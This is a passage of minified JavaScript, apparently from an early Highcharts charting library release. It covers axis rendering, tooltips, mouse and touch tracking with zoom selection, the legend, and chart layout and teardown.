return;if(K(aa))n.zIndex=aa;if(F)if(O)F.animate({d:O},null,F.onGetPath);else{F.hide();F.onGetPath=function(){F.show()}}else if(O&&O.length){k.svgElem=F=ga.path(O).attr(n).add();if(kb){$=function(nb){F.on(nb,function(Qb){kb[nb].apply(k,[Qb])})};for(S in kb)$(S)}}if(t&&K(t.text)&&O&&O.length&&Da>0&&Aa>0){t=Ca({align:R&& +ka&&"center",x:R?!ka&&4:10,verticalAlign:!R&&ka&&"middle",y:R?ka?16:10:ka?6:-4,rotation:R&&!ka&&90},t);if(!r)k.label=r=ga.text(t.text,0,0).attr({align:t.textAlign||t.align,rotation:t.rotation,zIndex:aa}).css(t.style).add();ka=[O[1],O[4],A(O[6],O[1])];O=[O[2],O[5],A(O[7],O[2])];S=tb.apply(Fa,ka);aa=tb.apply(Fa,O);r.align(t,false,{x:S,y:aa,width:Ia.apply(Fa,ka)-S,height:Ia.apply(Fa,O)-aa});r.show()}else r&&r.hide();return k},destroy:function(){Ac(this);nc(Pb,this)}};x.prototype={destroy:function(){Ac(this)}, +setTotal:function(k){this.cum=this.total=k},render:function(k){var n=this.options.formatter.call(this);if(this.label)this.label.attr({text:n,visibility:ob});else this.label=l.renderer.text(n,0,0).css(this.options.style).attr({align:this.textAlign,rotation:this.options.rotation,visibility:ob}).add(k)},setOffset:function(k,n){var t=this.isNegative,r=I.translate(this.total),J=I.translate(0);J=bb(r-J);var E=l.xAxis[0].translate(this.x)+k,Q=l.plotHeight;t={x:va?t?r:r-J:E,y:va?Q-E-n:t?Q-r-J:Q-r,width:va? +J:n,height:va?n:J};this.label&&this.label.align(this.alignOptions,null,t).attr({visibility:Ab})}};G=function(k,n,t,r,J){var E=1,Q=0,fa=r?Hb:fb;r=r?Dc:ia;fa||(fa=fb);if(t){E*=-1;Q=ya}if(ec){E*=-1;Q-=E*ya}if(n){if(ec)k=ya-k;k=k/fa+r;if(ca&&J)k=Fa.pow(10,k)}else{if(ca&&J)k=mc(k);k=E*(k-r)*fa+Q}return k};ha=function(k,n,t){var r,J,E;k=G(k,null,null,t);var Q=t&&ad||cb,fa=t&&qd||$a,ka;t=J=W(k+cc);r=E=W(Q-k-cc);if(isNaN(k))ka=true;else if(R){r=ea;E=Q-vb;if(t<X||t>X+Da)ka=true}else{t=X;J=fa-Ib;if(r<ea||r> +ea+Aa)ka=true}return ka?null:ga.crispLine([Za,t,r,Ka,J,E],n||0)};if(va&&xa&&ec===Wa)ec=true;sa(I,{addPlotBand:za,addPlotLine:za,adjustTickAmount:function(){if(Ob&&!D&&!Ya&&!Ub){var k=qc,n=Ba.length;qc=Ob[qa];if(n<qc){for(;Ba.length<qc;)Ba.push(ta(Ba[Ba.length-1]+Ta));fb*=(n-1)/(qc-1);ra=Ba[Ba.length-1]}if(K(k)&&qc!==k)I.isDirty=true}},categories:Ya,getExtremes:function(){return{min:ia,max:ra,dataMin:pa,dataMax:wa,userMin:Vb,userMax:Gb}},getPlotLinePath:ha,getThreshold:function(k){if(ia>k)k=ia;else if(ra< +k)k=ra;return G(k,0,1)},isXAxis:xa,options:o,plotLinesAndBands:Pb,getOffset:function(){var k=zb.length&&K(ia)&&K(ra),n=0,t=0,r=o.title,J=o.labels,E=[-1,1,1,-1][L],Q;if(!na){na=ga.g("axis").attr({zIndex:7}).add();Ra=ga.g("grid").attr({zIndex:1}).add()}rc=0;if(k||Ub){u(Ba,function(fa){if(mb[fa])mb[fa].addLabel();else mb[fa]=new q(fa);if(L===0||L===2||{1:"left",3:"right"}[L]===J.align)rc=Ia(mb[fa].getLabelSize(),rc)});if($c)rc+=($c-1)*16}else for(Q in mb){mb[Q].destroy();delete mb[Q]}if(r&&r.text){if(!ba){ba= +I.axisTitle=ga.text(r.text,0,0,r.useHTML).attr({zIndex:7,rotation:r.rotation||0,align:r.textAlign||{low:"left",middle:"center",high:"right"}[r.align]}).css(r.style).add();ba.isNew=true}n=ba.getBBox()[R?"height":"width"];t=A(r.margin,R?5:10)}la=E*(o.offset||Xb[L]);nd=rc+(L!==2&&rc&&E*o.labels[R?"y":"x"])+t;Xb[L]=Ia(Xb[L],nd+n+E*la)},render:eb,setCategories:function(k,n){I.categories=p.categories=Ya=k;u(zb,function(t){t.translate();t.setTooltipPoints(true)});I.isDirty=true;A(n,true)&&l.redraw()},setExtremes:function(k, +n,t,r){t=A(t,true);Pa(I,"setExtremes",{min:k,max:n},function(){Vb=k;Gb=n;t&&l.redraw(r)})},setScale:Ma,setTickPositions:da,translate:G,redraw:function(){Yb.resetTracker&&Yb.resetTracker();eb();u(Pb,function(k){k.render()});u(zb,function(k){k.isDirty=true})},removePlotBand:ab,removePlotLine:ab,reversed:ec,stacks:s,destroy:function(){var k;pb(I);for(k in s){Ac(s[k]);s[k]=null}if(I.stackTotalGroup)I.stackTotalGroup=I.stackTotalGroup.destroy();u([mb,Wb,dc,Pb],function(n){Ac(n)});u([La,na,Ra,ba],function(n){n&& +n.destroy()});La=na=Ra=ba=null}});for(pd in B)Qa(I,pd,B[pd]);Ma()}function d(){var p={};return{add:function(q,w,x,V){if(!p[q]){w=ga.text(w,0,0).css(a.toolbar.itemStyle).align({align:"right",x:-Ib-20,y:ea+30}).on("click",V).attr({align:"right",zIndex:20}).add();p[q]=w}},remove:function(q){pc(p[q].element);p[q]=null}}}function e(p){function q(){var B=this.points||zc(this),D=B[0].series.xAxis,ca=this.x;D=D&&D.options.type==="datetime";var la=Sb(ca)||D,qa;qa=la?['<span style="font-size: 10px">'+(D?Zc("%A, %b %e, %Y", +ca):ca)+"</span>"]:[];u(B,function(ya){qa.push(ya.point.tooltipFormatter(la))});return qa.join("<br/>")}function w(B,D){L=xa?B:(2*L+B)/3;s=xa?D:(s+D)/2;o.translate(L,s);rd=bb(B-L)>1||bb(D-s)>1?function(){w(B,D)}:null}function x(){if(!xa){var B=l.hoverPoints;o.hide();u(da,function(D){D&&D.hide()});B&&u(B,function(D){D.setState()});l.hoverPoints=null;xa=true}}var V,N=p.borderWidth,ta=p.crosshairs,da=[],Ma=p.style,za=p.shared,eb=ja(Ma.padding),ab=N+eb,xa=true,Oa,R,L=0,s=0;Ma.padding=0;var o=ga.g("tooltip").attr({zIndex:8}).add(), +I=ga.rect(ab,ab,0,0,p.borderRadius,N).attr({fill:p.backgroundColor,"stroke-width":N}).add(o).shadow(p.shadow),ba=ga.text("",eb+ab,ja(Ma.fontSize)+eb+ab,p.useHTML).attr({zIndex:1}).css(Ma).add(o);o.hide();return{shared:za,refresh:function(B){var D,ca,la,qa=0,ya={},fb=[];la=B.tooltipPos;D=p.formatter||q;ya=l.hoverPoints;if(za){ya&&u(ya,function(Hb){Hb.setState()});l.hoverPoints=B;u(B,function(Hb){Hb.setState(Bb);qa+=Hb.plotY;fb.push(Hb.getLabelConfig())});ca=B[0].plotX;qa=W(qa)/B.length;ya={x:B[0].category}; +ya.points=fb;B=B[0]}else ya=B.getLabelConfig();ya=D.call(ya);V=B.series;ca=za?ca:B.plotX;qa=za?qa:B.plotY;D=W(la?la[0]:va?Da-qa:ca);ca=W(la?la[1]:va?Aa-ca:qa);la=za||!B.series.isCartesian||gc(D,ca);if(ya===false||!la)x();else{if(xa){o.show();xa=false}ba.attr({text:ya});la=ba.getBBox();Oa=la.width+2*eb;R=la.height+2*eb;I.attr({width:Oa,height:R,stroke:p.borderColor||B.color||V.color||"#606060"});D=fe(Oa,R,X,ea,Da,Aa,{x:D,y:ca});w(W(D.x-ab),W(D.y-ab))}if(ta){ta=zc(ta);for(D=ta.length;D--;){ca=B.series[D? +"yAxis":"xAxis"];if(ta[D]&&ca){ca=ca.getPlotLinePath(B[D?"y":"x"],1);if(da[D])da[D].attr({d:ca,visibility:Ab});else{la={"stroke-width":ta[D].width||1,stroke:ta[D].color||"#C0C0C0",zIndex:2};if(ta[D].dashStyle)la.dashstyle=ta[D].dashStyle;da[D]=ga.path(ca).attr(la).add()}}}}},hide:x,destroy:function(){u(da,function(B){B&&B.destroy()});u([I,ba,o],function(B){B&&B.destroy()});I=ba=o=null}}}function f(p){function q(L){var s,o=Ud&&ua.width/ua.body.scrollWidth-1,I,ba,B;L=L||db.event;if(!L.target)L.target= +L.srcElement;s=L.touches?L.touches.item(0):L;if(L.type!=="mousemove"||db.opera||o){Jb=Fd(oa);I=Jb.left;ba=Jb.top}if(Pc){B=L.x;s=L.y}else if(s.layerX===Wa){B=s.pageX-I;s=s.pageY-ba}else{B=L.layerX;s=L.layerY}if(o){B+=W((o+1)*I-I);s+=W((o+1)*ba-ba)}return sa(L,{chartX:B,chartY:s})}function w(L){var s={xAxis:[],yAxis:[]};u(Va,function(o){var I=o.translate,ba=o.isXAxis;s[ba?"xAxis":"yAxis"].push({axis:o,value:I((va?!ba:ba)?L.chartX-X:Aa-L.chartY+ea,true)})});return s}function x(){var L=l.hoverSeries, +s=l.hoverPoint;s&&s.onMouseOut();L&&L.onMouseOut();hc&&hc.hide();sd=null}function V(){if(za){var L={xAxis:[],yAxis:[]},s=za.getBBox(),o=s.x-X,I=s.y-ea;if(Ma){u(Va,function(ba){var B=ba.translate,D=ba.isXAxis,ca=va?!D:D,la=B(ca?o:Aa-I-s.height,true,0,0,1);B=B(ca?o+s.width:Aa-I,true,0,0,1);L[D?"xAxis":"yAxis"].push({axis:ba,min:tb(la,B),max:Ia(la,B)})});Pa(l,"selection",L,td)}za=za.destroy()}l.mouseIsDown=ud=Ma=false;pb(ua,Kb?"touchend":"mouseup",V)}function N(L){var s=K(L.pageX)?L.pageX:L.page.x;L= +K(L.pageX)?L.pageY:L.page.y;Jb&&!gc(s-Jb.left-X,L-Jb.top-ea)&&x()}var ta,da,Ma,za,eb=z.zoomType,ab=/x/.test(eb),xa=/y/.test(eb),Oa=ab&&!va||xa&&va,R=xa&&!va||ab&&va;bd=function(){if(Ec){Ec.translate(X,ea);va&&Ec.attr({width:l.plotWidth,height:l.plotHeight}).invert()}else l.trackerGroup=Ec=ga.g("tracker").attr({zIndex:9}).add()};bd();if(p.enabled)l.tooltip=hc=e(p);(function(){oa.onmousedown=function(s){s=q(s);!Kb&&s.preventDefault&&s.preventDefault();l.mouseIsDown=ud=true;ta=s.chartX;da=s.chartY;Qa(ua, +Kb?"touchend":"mouseup",V)};var L=function(s){if(!(s&&s.touches&&s.touches.length>1)){s=q(s);if(!Kb)s.returnValue=false;var o=s.chartX,I=s.chartY,ba=!gc(o-X,I-ea);Jb||(Jb=Fd(oa));if(Kb&&s.type==="touchstart")if(Ga(s.target,"isTracker"))l.runTrackerClick||s.preventDefault();else!ke&&!ba&&s.preventDefault();if(ba){if(o<X)o=X;else if(o>X+Da)o=X+Da;if(I<ea)I=ea;else if(I>ea+Aa)I=ea+Aa}if(ud&&s.type!=="touchstart"){Ma=Math.sqrt(Math.pow(ta-o,2)+Math.pow(da-I,2));if(Ma>10){if(sc&&(ab||xa)&&gc(ta-X,da-ea))za|| +(za=ga.rect(X,ea,Oa?1:Da,R?1:Aa,0).attr({fill:z.selectionMarkerFill||"rgba(69,114,167,0.25)",zIndex:7}).add());if(za&&Oa){o=o-ta;za.attr({width:bb(o),x:(o>0?0:o)+ta})}if(za&&R){I=I-da;za.attr({height:bb(I),y:(I>0?0:I)+da})}}}else if(!ba){var B;I=l.hoverPoint;o=l.hoverSeries;var D,ca,la=$a,qa=va?s.chartY:s.chartX-X;if(hc&&p.shared){B=[];D=Ha.length;for(ca=0;ca<D;ca++)if(Ha[ca].visible&&Ha[ca].tooltipPoints.length){s=Ha[ca].tooltipPoints[qa];s._dist=bb(qa-s.plotX);la=tb(la,s._dist);B.push(s)}for(D= +B.length;D--;)B[D]._dist>la&&B.splice(D,1);if(B.length&&B[0].plotX!==sd){hc.refresh(B);sd=B[0].plotX}}if(o&&o.tracker)(s=o.tooltipPoints[qa])&&s!==I&&s.onMouseOver()}return ba||!sc}};oa.onmousemove=L;Qa(oa,"mouseleave",x);Qa(ua,"mousemove",N);oa.ontouchstart=function(s){if(ab||xa)oa.onmousedown(s);L(s)};oa.ontouchmove=L;oa.ontouchend=function(){Ma&&x()};oa.onclick=function(s){var o=l.hoverPoint;s=q(s);s.cancelBubble=true;if(!Ma)if(o&&Ga(s.target,"isTracker")){var I=o.plotX,ba=o.plotY;sa(o,{pageX:Jb.left+ +X+(va?Da-ba:I),pageY:Jb.top+ea+(va?Aa-I:ba)});Pa(o.series,"click",sa(s,{point:o}));o.firePointEvent("click",s)}else{sa(s,w(s));gc(s.chartX-X,s.chartY-ea)&&Pa(l,"click",s)}Ma=false}})();Vd=setInterval(function(){rd&&rd()},32);sa(this,{zoomX:ab,zoomY:xa,resetTracker:x,destroy:function(){if(l.trackerGroup)l.trackerGroup=Ec=l.trackerGroup.destroy();pb(ua,"mousemove",N);oa.onclick=oa.onmousedown=oa.onmousemove=oa.ontouchstart=oa.ontouchend=oa.ontouchmove=null}})}function g(p){var q=p.type||z.type||z.defaultSeriesType, +w=wb[q],x=l.hasRendered;if(x)if(va&&q==="column")w=wb.bar;else if(!va&&q==="bar")w=wb.column;q=new w;q.init(l,p);if(!x&&q.inverted)va=true;if(q.isCartesian)sc=q.isCartesian;Ha.push(q);return q}function h(){z.alignTicks!==false&&u(Va,function(p){p.adjustTickAmount()});Ob=null}function i(p){var q=l.isDirtyLegend,w,x=l.isDirtyBox,V=Ha.length,N=V,ta=l.clipRect;for(oc(p,l);N--;){p=Ha[N];if(p.isDirty&&p.options.stacking){w=true;break}}if(w)for(N=V;N--;){p=Ha[N];if(p.options.stacking)p.isDirty=true}u(Ha, +function(da){if(da.isDirty){da.cleanData();da.getSegments();if(da.options.legendType==="point")q=true}});if(q&&Fc.renderLegend){Fc.renderLegend();l.isDirtyLegend=false}if(sc){if(!cd){Ob=null;u(Va,function(da){da.setScale()})}h();Gc();u(Va,function(da){if(da.isDirty||x){da.redraw();x=true}})}if(x){vd();bd();if(ta){Hc(ta);ta.animate({width:l.plotSizeX,height:l.plotSizeY})}}u(Ha,function(da){if(da.isDirty&&da.visible&&(!da.isCartesian||da.xAxis))da.redraw()});Yb&&Yb.resetTracker&&Yb.resetTracker();Pa(l, +"redraw")}function j(){var p=a.xAxis||{},q=a.yAxis||{},w;p=zc(p);u(p,function(x,V){x.index=V;x.isX=true});q=zc(q);u(q,function(x,V){x.index=V});Va=p.concat(q);l.xAxis=[];l.yAxis=[];Va=tc(Va,function(x){w=new c(x);l[w.isXAxis?"xAxis":"yAxis"].push(w);return w});h()}function m(p,q){uc=Ca(a.title,p);Ic=Ca(a.subtitle,q);u([["title",p,uc],["subtitle",q,Ic]],function(w){var x=w[0],V=l[x],N=w[1];w=w[2];if(V&&N)V=V.destroy();if(w&&w.text&&!V)l[x]=ga.text(w.text,0,0,w.useHTML).attr({align:w.align,"class":"highcharts-"+ +x,zIndex:1}).css(w.style).add().align(w,false,Rb)})}function v(){qb=z.renderTo;Wd=vc+wd++;if(Sb(qb))qb=ua.getElementById(qb);qb.innerHTML="";if(!qb.offsetWidth){Zb=qb.cloneNode(0);Ja(Zb,{position:ic,top:"-9999px",display:""});ua.body.appendChild(Zb)}dd=(Zb||qb).offsetWidth;Jc=(Zb||qb).offsetHeight;l.chartWidth=$a=z.width||dd||600;l.chartHeight=cb=z.height||(Jc>19?Jc:400);l.container=oa=hb(Tb,{className:"highcharts-container"+(z.className?" "+z.className:""),id:Wd},sa({position:Xd,overflow:ob,width:$a+ +Ua,height:cb+Ua,textAlign:"left"},z.style),Zb||qb);l.renderer=ga=z.forExport?new ed(oa,$a,cb,true):new fd(oa,$a,cb);var p,q;if(Yd&&oa.getBoundingClientRect){p=function(){Ja(oa,{left:0,top:0});q=oa.getBoundingClientRect();Ja(oa,{left:-(q.left-ja(q.left))+Ua,top:-(q.top-ja(q.top))+Ua})};p();Qa(db,"resize",p);Qa(l,"destroy",function(){pb(db,"resize",p)})}}function P(){function p(){var w=z.width||qb.offsetWidth,x=z.height||qb.offsetHeight;if(w&&x){if(w!==dd||x!==Jc){clearTimeout(q);q=setTimeout(function(){xd(w, +x,false)},100)}dd=w;Jc=x}}var q;Qa(db,"resize",p);Qa(l,"destroy",function(){pb(db,"resize",p)})}function T(){Pa(l,"endResize",null,function(){cd-=1})}function Y(){var p=a.labels,q=a.credits,w;m();Fc=l.legend=new le;Gc();u(Va,function(x){x.setTickPositions(true)});h();Gc();vd();sc&&u(Va,function(x){x.render()});if(!l.seriesGroup)l.seriesGroup=ga.g("series-group").attr({zIndex:3}).add();u(Ha,function(x){x.translate();x.setTooltipPoints();x.render()});p.items&&u(p.items,function(){var x=sa(p.style,this.style), +V=ja(x.left)+X,N=ja(x.top)+ea+12;delete x.left;delete x.top;ga.text(this.html,V,N).attr({zIndex:2}).css(x).add()});if(!l.toolbar)l.toolbar=d();if(q.enabled&&!l.credits){w=q.href;l.credits=ga.text(q.text,0,0).on("click",function(){if(w)location.href=w}).attr({align:q.position.align,zIndex:8}).css(q.style).add().align(q.position)}bd();l.hasRendered=true;if(Zb){qb.appendChild(oa);pc(Zb)}}function H(){var p,q=oa&&oa.parentNode;if(l!==null){Pa(l,"destroy");pb(db,"unload",H);pb(l);for(p=Va.length;p--;)Va[p]= +Va[p].destroy();for(p=Ha.length;p--;)Ha[p]=Ha[p].destroy();u(["title","subtitle","seriesGroup","clipRect","credits","tracker"],function(w){var x=l[w];if(x)l[w]=x.destroy()});u([wc,xc,Kc,Fc,hc,ga,Yb],function(w){w&&w.destroy&&w.destroy()});wc=xc=Kc=Fc=hc=ga=Yb=null;if(oa){oa.innerHTML="";pb(oa);q&&pc(oa);oa=null}clearInterval(Vd);for(p in l)delete l[p];l=null}}function U(){if(!Lc&&db==db.top&&ua.readyState!=="complete")ua.attachEvent("onreadystatechange",function(){ua.detachEvent("onreadystatechange", +U);ua.readyState==="complete"&&U()});else{v();yd();zd();u(a.series||[],function(p){g(p)});l.inverted=va=A(va,a.chart.inverted);j();l.render=Y;l.tracker=Yb=new f(a.tooltip);Y();Pa(l,"load");b&&b.apply(l,[l]);u(l.callbacks,function(p){p.apply(l,[l])})}}Yc=Ca(Yc,Xa.xAxis);od=Ca(od,Xa.yAxis);Xa.xAxis=Xa.yAxis=null;a=Ca(Xa,a);var z=a.chart,M=z.margin;M=Nb(M)?M:[M,M,M,M];var y=A(z.marginTop,M[0]),C=A(z.marginRight,M[1]),Z=A(z.marginBottom,M[2]),Sa=A(z.marginLeft,M[3]),Na=z.spacingTop,Ea=z.spacingRight, +gb=z.spacingBottom,Lb=z.spacingLeft,Rb,uc,Ic,ea,Ib,vb,X,Xb,qb,Zb,oa,Wd,dd,Jc,$a,cb,qd,ad,wc,Kc,Ad,xc,l=this,ke=(M=z.events)&&!!M.click,Bd,gc,hc,ud,jc,Zd,Cd,Aa,Da,Yb,Ec,bd,Fc,$b,ac,Jb,sc=z.showAxes,cd=0,Va=[],Ob,Ha=[],va,ga,rd,Vd,sd,vd,Gc,yd,zd,xd,td,$d,le=function(){function p(G,ha){var na=G.legendItem,Ra=G.legendLine,La=G.legendSymbol,pa=Oa.color,wa=ha?N.itemStyle.color:pa,zb=ha?G.color:pa;pa=ha?G.pointAttr[ib]:{stroke:pa,fill:pa};na&&na.css({fill:wa});Ra&&Ra.attr({stroke:zb});La&&La.attr(pa)}function q(G, +ha,na){var Ra=G.legendItem,La=G.legendLine,pa=G.legendSymbol;G=G.checkbox;Ra&&Ra.attr({x:ha,y:na});La&&La.translate(ha,na-4);pa&&pa.attr({x:ha+pa.xOff,y:na+pa.yOff});if(G){G.x=ha;G.y=na}}function w(){u(za,function(G){var ha=G.checkbox,na=qa.alignAttr;ha&&Ja(ha,{left:na.translateX+G.legendItemWidth+ha.x-40+Ua,top:na.translateY+ha.y-11+Ua})})}function x(G){var ha,na,Ra,La,pa=G.legendItem;La=G.series||G;var wa=La.options,zb=wa&&wa.borderWidth||0;if(!pa){La=/^(bar|pie|area|column)$/.test(La.type);G.legendItem= +pa=ga.text(N.labelFormatter.call(G),0,0).css(G.visible?ab:Oa).on("mouseover",function(){G.setState(Bb);pa.css(xa)}).on("mouseout",function(){pa.css(G.visible?ab:Oa);G.setState()}).on("click",function(){var Gb=function(){G.setVisible()};G.firePointEvent?G.firePointEvent("legendItemClick",null,Gb):Pa(G,"legendItemClick",null,Gb)}).attr({zIndex:2}).add(qa);if(!La&&wa&&wa.lineWidth){var Vb={"stroke-width":wa.lineWidth,zIndex:2};if(wa.dashStyle)Vb.dashstyle=wa.dashStyle;G.legendLine=ga.path([Za,-da-Ma, +0,Ka,-Ma,0]).attr(Vb).add(qa)}if(La)ha=ga.rect(na=-da-Ma,Ra=-11,da,12,2).attr({zIndex:3}).add(qa);else if(wa&&wa.marker&&wa.marker.enabled)ha=ga.symbol(G.symbol,na=-da/2-Ma,Ra=-4,wa.marker.radius).attr({zIndex:3}).add(qa);if(ha){ha.xOff=na+zb%2/2;ha.yOff=Ra+zb%2/2}G.legendSymbol=ha;p(G,G.visible);if(wa&&wa.showCheckbox){G.checkbox=hb("input",{type:"checkbox",checked:G.selected,defaultChecked:G.selected},N.itemCheckboxStyle,oa);Qa(G.checkbox,"click",function(Gb){Pa(G,"checkboxClick",{checked:Gb.target.checked}, +function(){G.select()})})}}ha=pa.getBBox();na=G.legendItemWidth=N.itemWidth||da+Ma+ha.width+R;B=ha.height;if(ta&&o-s+na>(fb||$a-2*R-s)){o=s;I+=B}ba=I;q(G,o,I);if(ta)o+=na;else I+=B;ya=fb||Ia(ta?o-s:na,ya)}function V(){o=s;I=L;ba=ya=0;qa||(qa=ga.g("legend").attr({zIndex:7}).add());za=[];u(Hb,function(Ra){var La=Ra.options;if(La.showInLegend)za=za.concat(La.legendType==="point"?Ra.data:Ra)});Hd(za,function(Ra,La){return(Ra.options.legendIndex||0)-(La.options.legendIndex||0)});cc&&za.reverse();u(za, +x);$b=fb||ya;ac=ba-L+B;if(ca||la){$b+=2*R;ac+=2*R;if(D){if($b>0&&ac>0){D[D.isNew?"attr":"animate"](D.crisp(null,null,null,$b,ac));D.isNew=false}}else{D=ga.rect(0,0,$b,ac,N.borderRadius,ca||0).attr({stroke:N.borderColor,"stroke-width":ca||0,fill:la||jb}).add(qa).shadow(N.shadow);D.isNew=true}D[za.length?"show":"hide"]()}for(var G=["left","right","top","bottom"],ha,na=4;na--;){ha=G[na];if(eb[ha]&&eb[ha]!=="auto"){N[na<2?"align":"verticalAlign"]=ha;N[na<2?"x":"y"]=ja(eb[ha])*(na%2?-1:1)}}za.length&& +qa.align(sa(N,{width:$b,height:ac}),true,Rb);cd||w()}var N=l.options.legend;if(N.enabled){var ta=N.layout==="horizontal",da=N.symbolWidth,Ma=N.symbolPadding,za,eb=N.style,ab=N.itemStyle,xa=N.itemHoverStyle,Oa=N.itemHiddenStyle,R=ja(eb.padding),L=18,s=4+R+da+Ma,o,I,ba,B=0,D,ca=N.borderWidth,la=N.backgroundColor,qa,ya,fb=N.width,Hb=l.series,cc=N.reversed;V();Qa(l,"endResize",w);return{colorizeItem:p,destroyItem:function(G){var ha=G.checkbox;u(["legendItem","legendLine","legendSymbol"],function(na){G[na]&& +G[na].destroy()});ha&&pc(G.checkbox)},renderLegend:V,destroy:function(){if(D)D=D.destroy();if(qa)qa=qa.destroy()}}}};gc=function(p,q){return p>=0&&p<=Da&&q>=0&&q<=Aa};$d=function(){Pa(l,"selection",{resetSelection:true},td);l.toolbar.remove("zoom")};td=function(p){var q=Xa.lang,w=l.pointCount<100;l.toolbar.add("zoom",q.resetZoom,q.resetZoomTitle,$d);!p||p.resetSelection?u(Va,function(x){x.setExtremes(null,null,false,w)}):u(p.xAxis.concat(p.yAxis),function(x){var V=x.axis;if(l.tracker[V.isXAxis?"zoomX": +"zoomY"])V.setExtremes(x.min,x.max,false,w)});i()};Gc=function(){var p=a.legend,q=A(p.margin,10),w=p.x,x=p.y,V=p.align,N=p.verticalAlign,ta;yd();if((l.title||l.subtitle)&&!K(y))if(ta=Ia(l.title&&!uc.floating&&!uc.verticalAlign&&uc.y||0,l.subtitle&&!Ic.floating&&!Ic.verticalAlign&&Ic.y||0))ea=Ia(ea,ta+A(uc.margin,15)+Na);if(p.enabled&&!p.floating)if(V==="right")K(C)||(Ib=Ia(Ib,$b-w+q+Ea));else if(V==="left")K(Sa)||(X=Ia(X,$b+w+q+Lb));else if(N==="top")K(y)||(ea=Ia(ea,ac+x+q+Na));else if(N==="bottom")K(Z)|| +(vb=Ia(vb,ac-x+q+gb));sc&&u(Va,function(da){da.getOffset()});K(Sa)||(X+=Xb[3]);K(y)||(ea+=Xb[0]);K(Z)||(vb+=Xb[2]);K(C)||(Ib+=Xb[1]);zd()};xd=function(p,q,w){var x=l.title,V=l.subtitle;cd+=1;oc(w,l);ad=cb;qd=$a;l.chartWidth=$a=W(p);l.chartHeight=cb=W(q);Ja(oa,{width:$a+Ua,height:cb+Ua});ga.setSize($a,cb,w);Da=$a-X-Ib;Aa=cb-ea-vb;Ob=null;u(Va,function(N){N.isDirty=true;N.setScale()});u(Ha,function(N){N.isDirty=true});l.isDirtyLegend=true;l.isDirtyBox=true;Gc();x&&x.align(null,null,Rb);V&&V.align(null, +null,Rb);i(w);ad=null;Pa(l,"resize");Bc===false?T():setTimeout(T,Bc&&Bc.duration||500)};zd=function(){l.plotLeft=X=W(X);l.plotTop=ea=W(ea);l.plotWidth=Da=W($a-X-Ib);l.plotHeight=Aa=W(cb-ea-vb);l.plotSizeX=va?Aa:Da;l.plotSizeY=va?Da:Aa;Rb={x:Lb,y:Na,width:$a-Lb-Ea,height:cb-Na-gb}};yd=function(){ea=A(y,Na);Ib=A(C,Ea);vb=A(Z,gb);X=A(Sa,Lb);Xb=[0,0,0,0]};vd=function(){var p=z.borderWidth||0,q=z.backgroundColor,w=z.plotBackgroundColor,x=z.plotBackgroundImage,V,N={x:X,y:ea,width:Da,height:Aa};V=p+(z.shadow? +8:0);if(p||q)if(wc)wc.animate(wc.crisp(null,null,null,$a-V,cb-V));else wc=ga.rect(V/2,V/2,$a-V,cb-V,z.borderRadius,p).attr({stroke:z.borderColor,"stroke-width":p,fill:q||jb}).add().shadow(z.shadow);if(w)if(Kc)Kc.animate(N);else Kc=ga.rect(X,ea,Da,Aa,0).attr({fill:w}).add().shadow(z.plotShadow);if(x)if(Ad)Ad.animate(N);else Ad=ga.image(x,X,ea,Da,Aa).add();if(z.plotBorderWidth)if(xc)xc.animate(xc.crisp(null,X,ea,Da,Aa));else xc=ga.rect(X,ea,Da,Aa,0,z.plotBorderWidth).attr({stroke:z.plotBorderColor, +"stroke-width":z.plotBorderWidth,zIndex:4}).add();l.isDirtyBox=false};Qa(db,"unload",H);z.reflow!==false&&Qa(l,"load",P);if(M)for(Bd in M)Qa(l,Bd,M[Bd]);l.options=a;l.series=Ha;l.addSeries=function(p,q,w){var x;if(p){oc(w,l);q=A(q,true);Pa(l,"addSeries",{options:p},function(){x=g(p);x.isDirty=true;l.isDirtyLegend=true;q&&l.redraw()})}return x};l.animation=A(z.animation,true);l.destroy=H;l.get=function(p){var q,w,x;for(q=0;q<Va.length;q++)if(Va[q].options.id===p)return Va[q];for(q=0;q<Ha.length;q++)if(Ha[q].options.id=== +p)return Ha[q];for(q=0;q<Ha.length;q++){x=Ha[q].data;for(w=0;w<x.length;w++)if(x[w].id===p)return x[w]}return null};l.getSelectedPoints=function(){var p=[];u(Ha,function(q){p=p.concat(Dd(q.data,function(w){return w.selected}))});return p};l.getSelectedSeries=function(){return Dd(Ha,function(p){return p.selected})};l.hideLoading=function(){gd(jc,{opacity:0},{duration:a.loading.hideDuration,complete:function(){Ja(jc,{display:jb})}});Cd=false};l.isInsidePlot=gc;l.redraw=i;l.setSize=xd;l.setTitle=m;l.showLoading= +function(p){var q=a.loading;if(!jc){jc=hb(Tb,{className:"highcharts-loading"},sa(q.style,{left:X+Ua,top:ea+Ua,width:Da+Ua,height:Aa+Ua,zIndex:10,display:jb}),oa);Zd=hb("span",null,q.labelStyle,jc)}Zd.innerHTML=p||a.lang.loading;if(!Cd){Ja(jc,{opacity:0,display:""});gd(jc,{opacity:q.style.opacity},{duration:q.showDuration});Cd=true}};l.pointCount=0;l.counters=new Gd;U()}var ua=document,db=window,Fa=Math,W=Fa.round,lb=Fa.floor,md=Fa.ceil,Ia=Fa.max,tb=Fa.min,bb=Fa.abs,rb=Fa.cos,Cb=Fa.sin,kc=Fa.PI,ae= +kc*2/360,yc=navigator.userAgent,Pc=/msie/i.test(yc)&&!db.opera,Mc=ua.documentMode===8,Ud=/AppleWebKit/.test(yc),Yd=/Firefox/.test(yc),Lc=!!ua.createElementNS&&!!ua.createElementNS("http://www.w3.org/2000/svg","svg").createSVGRect,me=Yd&&parseInt(yc.split("Firefox/")[1],10)<4,fd,Kb=ua.documentElement.ontouchstart!==undefined,be={},wd=0,ub=1,Tc,Xa,Zc,Bc,Nc,Wa,Tb="div",ic="absolute",Xd="relative",ob="hidden",vc="highcharts-",Ab="visible",Ua="px",jb="none",Za="M",Ka="L",ce="rgba(192,192,192,"+(Lc?1.0E-6: +0.0020)+")",ib="",Bb="hover",Qc,id,jd,kd,Cc,Rc,Sc,Jd,Kd,ld,Ld,Md,ma=db.HighchartsAdapter,Db=ma||{},u=Db.each,Dd=Db.grep,tc=Db.map,Ca=Db.merge,Qa=Db.addEvent,pb=Db.removeEvent,Pa=Db.fireEvent,gd=Db.animate,Hc=Db.stop,wb={};Zc=function(a,b,c){function d(P){return P.toString().replace(/^([0-9])$/,"0$1")}if(!K(b)||isNaN(b))return"Invalid date";a=A(a,"%Y-%m-%d %H:%M:%S");b=new Date(b*ub);var 